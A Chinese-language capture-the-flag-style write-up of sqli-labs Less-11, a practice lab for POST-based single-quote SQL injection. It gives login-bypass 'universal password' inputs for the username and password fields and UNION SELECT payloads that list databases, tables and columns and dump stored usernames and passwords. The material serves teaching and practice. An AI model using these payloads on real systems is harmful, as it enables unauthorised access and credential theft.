SQL注入——万能密码，使用sqlmap的注入方法和GET类似，无非多了一个--data

从Less11开始和前面的有所不同最大的一点就是：前面的都是Get方法，而现在开始的是POST方法。

Less-11实验主要是：单引号字符注入

从登陆界面的样子，最直接想到的就是“万能密码”。
我们先看一下源码，发现sql语句是这样的：

从这个代码里我们看到用户的地方输入用户名，而不能在用户名后闭合用前面的%23来注释后面的，如果注释了整个语句会出错。所以要保证整个语句正确一般有两种方法，要么在用户名位置构造返回是ture，要么在密码地方构造。

在用户名位置构造
构造的用户名在数据库中要存在，这里我们猜测会不用admin这样的用户名。
在用户名位置输入 admin' or '1'='1 密码位置随便输入任意内容

点击提交后，我们可以以用户admin登录进入

在密码位置构造
在用户名位置输入任意名字，密码位置随便输入sdfsd' or '1'='1

点击提交后，我们发现这里以数据库users表的第一个用户登录进去的。

这里出现这样的原因其实通过分析构造的两个语句就能看出来了：
select * from users where username='admin' or '1'='1' and password='fsdfs' 如果这里不用admin用的别的，那么接下来语句就是ture，语句被执行，返回的是空内容；所以username中的内容表中必须有。
select * from users where username='aaa' and password='sdfsd' or '1'='1' 而这一句其实等同于 select * from users where '1'='1' ，这就是直接执行select * from users 无任何条件。
大家就明白为什么在密码处构造不需要知道用户名是什么，也就是常说的万能密码，但登陆进去的一定是第一个用户。

less 11

post方法单引号绕过报错注入

这关跟之前get方法的差不了多少，只是get方法换成了post方法

post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到

uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="security"#&passwd=1

uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#&passwd=1

uname=1' union select 1,group_concat(concat_ws(char(32,58,32),id,username,password)) from users#&passwd=1

其中#表示注释，后面的SQL语句都不起作用了！

less-11

uname和passwd直接带入查询，万能密码